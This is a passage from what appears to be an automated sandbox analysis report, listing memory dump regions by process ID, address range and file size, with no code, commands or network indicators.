                                                                                                                                                                                                                                                • memory/4148-279-0x0000000005240000-0x0000000005846000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                                                • memory/4148-237-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                • memory/4156-243-0x000000000041905A-mapping.dmp
                                                                                                                                                                                                                                                • memory/4156-284-0x0000000005240000-0x000000000573E000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5.0MB

                                                                                                                                                                                                                                                • memory/4156-266-0x0000000005350000-0x0000000005351000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4156-236-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                • memory/4196-257-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-316-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4196-260-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-229-0x0000000003920000-0x000000000395C000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  240KB

                                                                                                                                                                                                                                                • memory/4196-233-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-235-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-289-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-323-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-322-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-321-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-319-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-318-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-311-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-314-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-294-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-306-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-304-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-249-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-273-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4196-238-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4268-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4284-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4328-278-0x0000000000418E52-mapping.dmp
                                                                                                                                                                                                                                                • memory/4328-310-0x00000000056F0000-0x0000000005CF6000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                                                • memory/4572-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4572-373-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  80KB

                                                                                                                                                                                                                                                • memory/4576-324-0x000000001AE40000-0x000000001AE42000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                • memory/4576-277-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4636-285-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4744-389-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4772-544-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4820-397-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4892-382-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4944-385-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4944-500-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/4984-396-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/5112-340-0x0000000002470000-0x0000000002471000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/5112-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/5128-438-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/5216-535-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/5448-472-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/5504-533-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/5684-540-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/5840-525-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/5880-486-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/5940-487-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/6016-490-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/6080-545-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/6088-495-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/6116-527-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/6764-549-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/6776-550-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/6788-551-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/6928-552-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                • memory/6940-553-0x0000000000000000-mapping.dmp